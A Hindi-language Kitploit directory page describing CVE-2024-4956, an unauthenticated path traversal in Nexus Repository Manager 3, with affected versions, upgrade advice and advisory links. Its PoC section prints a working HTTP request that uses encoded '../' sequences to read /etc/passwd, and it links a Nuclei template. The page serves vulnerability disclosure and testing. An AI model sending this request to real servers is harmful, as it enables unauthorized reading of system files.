Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-4956 — Nexus Repository 3 में बिना प्रमाणीकरण के Path Traversal | Kitploit
उपकरण/GitHubGitHub/erickfernandox/cve-2024-4956
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHuberickfernandox/cve-2024-4956

CVE-2024-4956

Nexus Repository 3 में बिना प्रमाणीकरण के Path Traversal

रिपॉजिटरी देखें
32 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-4956 - Nexus Repository Manager 3 में बिना प्रमाणीकरण के पाथ ट्रैवर्सल

Nexus Repository Manager एक रिपॉजिटरी मैनेजर है जो विकास के लिए आवश्यक आर्टिफैक्ट्स को व्यवस्थित, संग्रहीत और वितरित करता है।

Nexus Repository 3 के 3.68.1 से पहले के संस्करणों में एक पाथ ट्रैवर्सल भेद्यता खोजी गई है। यह भेद्यता एक हमलावर को बिना किसी प्रमाणीकरण के Nexus Repository एप्लिकेशन के दायरे से बाहर के सिस्टम फ़ाइलों को डाउनलोड करने के लिए URL बनाने की अनुमति देती है। यह एक महत्वपूर्ण जोखिम उत्पन्न करती है, क्योंकि यह संवेदनशील सिस्टम फ़ाइलों को उजागर कर सकती है और संभावित रूप से उस वातावरण की सुरक्षा से समझौता कर सकती है जहाँ Nexus Repository स्थापित है।

इस भेद्यता को कम करने के लिए Nexus Repository को जल्द से जल्द संस्करण 3.68.1 या उसके बाद के संस्करण में अपडेट करने की अनुशंसा की जाती है।

भेद्यता के बारे में अधिक जानकारी और तकनीकी विवरण के लिए, कृपया निम्नलिखित लिंक देखें:

संदर्भ:

  • https://support.sonatype.com/hc/en-us/articles/29416509323923-CVE-2024-4956-Nexus-Repository-3-Path-Traversal-2024-05-16

प्रभावित संस्करण

यह भेद्यता Sonatype Nexus Repository Manager के संस्करण 3.0 से 3.68.0 तक को प्रभावित करती है।

शमन:

इस भेद्यता को समाप्त करने के लिए Nexus Repository को अपग्रेड करना अनुशंसित तरीका है। हालाँकि, उन परिनियोजनों के लिए तत्काल शमन विकल्प उपलब्ध हैं जो तुरंत अपग्रेड नहीं कर सकते:

संदर्भ:

  • https://support.sonatype.com/hc/en-us/articles/29412417068819

PoC

root@kitploit:~
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0

उपर्युक्त PoC के साथ, /etc/passwd फ़ाइल को एक्सेस किए जाने को देखना संभव है:

Nuclei टेम्पलेट

(CVE-2024-4956.yaml) https://github.com/erickfernandox/CVE-2024-4956/blob/main/CVE-2024-4956.yaml

टूल डाउनलोड करें